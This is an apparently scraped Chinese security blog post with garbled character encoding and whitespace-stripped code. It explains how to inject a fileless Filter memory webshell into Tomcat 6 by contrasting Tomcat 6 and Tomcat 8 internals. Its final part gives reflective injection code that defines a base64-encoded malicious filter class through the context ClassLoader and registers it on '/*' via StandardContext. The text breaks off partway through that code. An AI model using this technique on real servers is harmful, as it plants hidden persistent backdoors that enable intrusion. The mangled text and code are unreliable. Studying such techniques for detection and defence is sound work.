Java安全之Tomcat6Filter內(nèi)存馬問題

第Java安全之Tomcat6Filter內(nèi)存馬問題目錄回顧Tomcat8打法探索Tomcat6與Tomcat8之間的區(qū)別

回顧Tomcat8打法

先回顧下之前Tomcat789的打法

這里先拋開78之間的區(qū)別，在8中，最后add到filterchain的都是一個(gè)filterconfig對(duì)象

ApplicationFilterConfig包含了FilterDef對(duì)象

構(gòu)造方法如下，如果當(dāng)前filter屬性為null會(huì)從FilterDef取filter的實(shí)例對(duì)象

ApplicationFilterConfig(Contextcontext,FilterDeffilterDef)throwsClassCastException,ClassNotFoundException,IllegalAccessException,InstantiationException,ServletException,InvocationTargetException,NamingException,IllegalArgumentException,NoSuchMethodException,SecurityException{

this.context=context;

this.filterDef=filterDef;

if(filterDef.getFilter()==null){

this.getFilter();

}else{

this.filter=filterDef.getFilter();

this.getInstanceManager().newInstance(this.filter);

this.initFilter();

}

FilterDef中存儲(chǔ)了filterClass/filterName/filter屬性

publicclassFilterDefimplementsSerializable{

privatestaticfinallongserialVersionUID=1L;

privatestaticfinalStringManagersm;

privateStringdescription=null;

privateStringdisplayName=null;

privatetransientFilterfilter=null;

privateStringfilterClass=null;

privateStringfilterName=null;

privateStringlargeIcon=null;

privatefinalMapString,Stringparameters=newHashMap();

privateStringsmallIcon=null;

privateStringasyncSupported=null;

publicFilterDef(){

}

再有就是createFilterChain中還涉及到filterMap

FilterMap里主要存放urlpatterner和filterName的映射

publicclassFilterMapextendsXmlEncodingBaseimplementsSerializable{

privatestaticfinallongserialVersionUID=1L;

publicstaticfinalintERROR=1;

publicstaticfinalintFORWARD=2;

publicstaticfinalintINCLUDE=4;

publicstaticfinalintREQUEST=8;

publicstaticfinalintASYNC=16;

privatestaticfinalintNOT_SET=0;

privateintdispatcherMapping=0;

privateStringfilterName=null;

privateString[]servletNames=newString[0];

privatebooleanmatchAllUrlPatterns=false;

privatebooleanmatchAllServletNames=false;

privateString[]urlPatterns=newString[0];

tomcat8下注入filter內(nèi)存馬流程如下：

FilterDef:設(shè)置setFilter(Filterfilter)setFilterName(StringfilterName)setFilterClass(StringfilterClass)這里filterName和filterClass應(yīng)該不是一個(gè)東西,最后調(diào)用StandardContext#addFilterDef將該惡意filterdefput到this.filterDefsFilterMap:addURLPattern(/*)setFilterName(StringfilterName)setDispatcher(DispatcherType.REQUEST.name())，最后調(diào)用StandardContext#addFilterMapBefore(filtermap)添加到this.filterMaps中ApplicationFilterConfig:調(diào)用有參構(gòu)造將FilterDef作為參數(shù)傳遞進(jìn)去后調(diào)有參構(gòu)造實(shí)例化一個(gè)ApplicationFilterConfig，最終put進(jìn)standardcontext的屬性里去。

探索Tomcat6與Tomcat8之間的區(qū)別

主要看下tomcat6和tomcat8之間createFilterChain不相同的地方看到ApplicationFilterFactory#createFilterChain

跟進(jìn)getFilter

主要代碼如下:

所以這里構(gòu)造filterDef的時(shí)候filterClass為evilfilter的全類名即可

再來看下FilterDef可以發(fā)現(xiàn)確實(shí)在Tomcat6下面沒有filter這個(gè)屬性了

所以一個(gè)很大的區(qū)別就是在getFilter方法，也就是獲取filter實(shí)例對(duì)象的邏輯：

Tomcat8中是通過filterDef的屬性filter值來拿到惡意filter實(shí)例

Tomcat6中是通過filterDef的屬性filterClass屬性作為類名，通過ClassLoader去實(shí)例化

這里當(dāng)我們調(diào)用有參構(gòu)造實(shí)例化ApplicationFilterConfig時(shí)，會(huì)進(jìn)入getFilter方法邏輯內(nèi)

重點(diǎn)看loadClass方法是否可以加載到我們的惡意filter，因?yàn)檫@個(gè)filter并不是真實(shí)存在，且我們也只是通過了當(dāng)前線程去defineClass的

跟進(jìn)WebappClassLoader#loadClass

看到this.findLoadedClass0(name)從resourceEntries也就是classes下各個(gè)包中的.class找，是否有這個(gè)類，有的話直接return這個(gè)entry的loadClass屬性

這個(gè)屬性存儲(chǔ)的是該類的class對(duì)象,如果這里面有該類名，后面就直接resovleClass了

這里肯定是沒有我們的惡意filter，繼續(xù)往下跟

后面直接調(diào)用java.lang.ClassLoader#findLoadedClass來通過ClassLoader去找是否已經(jīng)加載過該class了

而在這里是直接找到了

查閱開發(fā)資料并思考了一下：

這里因?yàn)槲覀冎笆峭ㄟ^當(dāng)前線程上下文加載器把惡意filter給loadClass了,所以這里就是可以找到的

后面隨手翻了下classloader的屬性,發(fā)現(xiàn)在classes屬性是存在該filter的class的

那么正好來debug一下當(dāng)前線程上下文ClassLoader#loadClass的過程

可以看到當(dāng)前上下文的ClassLoader就是WebappClassLoader,并且此時(shí)classes屬性里并沒有我們的惡意類

而當(dāng)步過defineClass后，當(dāng)前線程上下文ClassLoader也就是WebappClassLoader的classes屬性中就新增了我們的惡意filter的class

所以后續(xù)在getFilter的邏輯中也是可以成功通過

回溯上面的邏輯時(shí)，getFilter方法因?yàn)闀?huì)走到這個(gè)else邏輯內(nèi)，所以最終也是通過WebappClassLoader#loadClass的我們的惡意filter

以上，所以因?yàn)槲覀兦懊嬲{(diào)用的是Thread.currentThread().getContextClassLoader()去加載的我們惡意filter類，而tomcat6中g(shù)etFilter邏輯是通過this.context.getLoader().getClassLoader();去findClass，而這兩個(gè)ClassLoader又同為WebappClassLoader所以不會(huì)存在ClassNotfound的問題。所以tomcat6中注入filter內(nèi)存馬就不需要先實(shí)例化惡意filter存到filterDef中，直接使用Thread.currentThread().getContextClassLoader()去defineClass一下惡意filter即可。

注入內(nèi)存馬的主要代碼如下：

Methodvar1=ClassLoader.class.getDeclaredMethod("defineClass",byte[].class,Integer.TYPE,Integer.TYPE);

var1.setAccessible(true);

byte[]var2=base64decode("base64str");

var1.invoke(Thread.currentThread().getContextClassLoader(),var2,0,var2.length);

try{

if(STANDARDCONTET!=null){

//1反射獲取filterDef

ClassFilterDefClass=Class.forName("org.apache.catalina.deploy.FilterDef");

ConstructorFilterDefconstructor=FilterDefClass.getConstructor(newClass[]{});

ObjectfilterDef=FilterDefconstructor.newInstance();

//2設(shè)置filtername

MethodsetFilterNameMethod=FilterDefClass.getDeclaredMethod("setFilterName",String.class);

setFilterNameMethod.invoke(filterDef,filterName);

//3setFilterClass

MethodsetFilterClassMethod=FilterDefClass.getDeclaredMethod("setFilterClass",String.class);

setFilterClassMethod.invoke(filterDef,Thread.currentThread().getContextClassLoader().loadClass("HiganbanaFilter").getName());

//4addFilterDef

MethodaddFilterDef=STANDARDCONTET.getClass().getMethod("addFilterDef",FilterDefClass);

addFilterDef.invoke(STANDARDCONTET,filterDef);

//構(gòu)造FilterMap

ClassFilterMapClass=Class.forName("org.apache.catalina.deploy.FilterMap");

ObjectfilterMap=FilterMapClass.newInstance();

MethodsetFilterNameMethod2=FilterMapClass.getDeclaredMethod("setFilterName",String.class);

setFilterNameMethod2.invoke(filterMap,FilterDefClass.getDeclaredMethod("getFilterName").invoke(filterDef));

MethodsetDispatcherMethod=FilterMapClass.getDeclaredMethod("setDispatcher",String.class);

setDispatcherMethod.invoke(filterMap,"REQUEST");

MethodaddURLPatternMethod=FilterMapClass.getDeclaredMethod("addURLPattern",String.class);

addURLPatternMethod.invoke(filterMap,"/*");

MethodaddFilterMapMethod=STANDARDCONTET.getClass().getDeclaredMethod("addFilterMap",FilterMapClass);

addFilterMapMethod.invoke(STANDARDCONTET,filterMap);

//創(chuàng)建filterconfig并添加到standardcontext.filterconfigs數(shù)組里